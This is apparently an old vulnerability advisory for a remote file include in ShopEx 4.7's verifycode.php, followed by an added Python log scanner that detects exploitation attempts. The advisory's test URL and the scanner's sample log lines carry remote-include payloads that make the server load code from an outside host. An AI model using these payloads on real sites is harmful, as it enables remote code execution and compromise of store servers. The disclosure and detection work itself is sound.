ShopEx 4.7 and earlier versions: remote include vulnerability

2010-03-08T00:00:00
ID MYHACK58:62201026350
Type myhack58
Reporter Anonymous
Modified 2010-03-08T00:00:00

Description

ShopEx 4.7 and earlier versions: remote include vulnerability

Vulnerability description: verifycode.php

```php
<?php
/**
 * Login verification code generating file
 *
 * @package ShopEx online store system
 * @version 4.6
 * @author ShopEx.cn <>
 * @url
 * @since PHP 4.3
 * @copyright ShopEx.cn
 */
if (!defined("ISSHOP")) {
    Header("Location:../index.php");
    exit;
}

// Call the session file
// Note: $INC_SYSHOMEDIR is not assigned anywhere in this file before it is used in the include path
include_once($INC_SYSHOMEDIR."include/session.inc.php");
mt_srand((double)microtime() * 1000000);

// Generate the code
$strValidate = mt_rand(1000, 9999);
session_unregister("RANDOM_CODE");
session_register("RANDOM_CODE");
$_SESSION["RANDOM_CODE"] = $strValidate."";
$verifyImg = newclass("verifyCode", $strValidate);

// Output CAPTCHA image
$verifyImg->Output();
?>
```

Test method: <http://www.hackqing.cn/shop/verifycode.php?INC_SYSHOMEDIR=http://www.hackqing.com/xx.txt>?

Prevention recommendations: None. Please refer to the official patch from ShopEx.cn.
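A defensive check for this issue, as an added example that is not part of the original advisory: a Python scan of web-server access logs for requests that set `INC_SYSHOMEDIR` in the query string. The log lines, hosts and addresses are constructed, the two verdict labels are this example's own, and it assumes combined-log-format input and that no legitimate client ever sends this parameter.

```python
import re
from urllib.parse import urlsplit, parse_qsl

PARAM = "INC_SYSHOMEDIR"  # exact case: PHP variable names are case-sensitive
SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)  # http://, ftp://, php://, ...
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*"')

# Constructed sample lines (combined log format); hosts and IPs are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [08/Mar/2010:10:00:01 +0800] "GET /shop/verifycode.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [08/Mar/2010:10:00:07 +0800] "GET /shop/verifycode.php?INC_SYSHOMEDIR=http://files.example.net/xx.txt? HTTP/1.1" 200 17 "-" "curl/7.19"
203.0.113.9 - - [08/Mar/2010:10:00:09 +0800] "GET /shop/verifycode.php?INC_SYSHOMEDIR=%48TTP%3A%2F%2Ffiles.example.net%2Fxx.txt HTTP/1.1" 200 17 "-" "curl/7.19"
198.51.100.7 - - [08/Mar/2010:10:00:30 +0800] "GET /shop/verifycode.php?INC_SYSHOMEDIR=/tmp/ HTTP/1.1" 200 17 "-" "curl/7.19"
198.51.100.2 - - [08/Mar/2010:10:01:00 +0800] "GET /shop/index.php?page=2 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""


def classify(line):
    """Return (client, path, verdict) for a request that sets PARAM, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, _method, target = m.groups()
    url = urlsplit(target)
    # parse_qsl percent-decodes once, so encoded schemes (%48TTP%3A%2F%2F) are seen in clear
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == PARAM:
            # A URL scheme in the value points at a remote include attempt;
            # any other value is still an attempt to override the include path.
            verdict = "remote-include" if SCHEME.match(value) else "variable-override"
            return client, url.path, verdict
    return None


def scan(log_text):
    """Classify every line and keep only the flagged requests."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for client, path, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:17} {client:15} {path}")
```

Where PHP imports request variables as globals (for example `register_globals`), the same name can also arrive in a POST body or cookie, which an access log does not record.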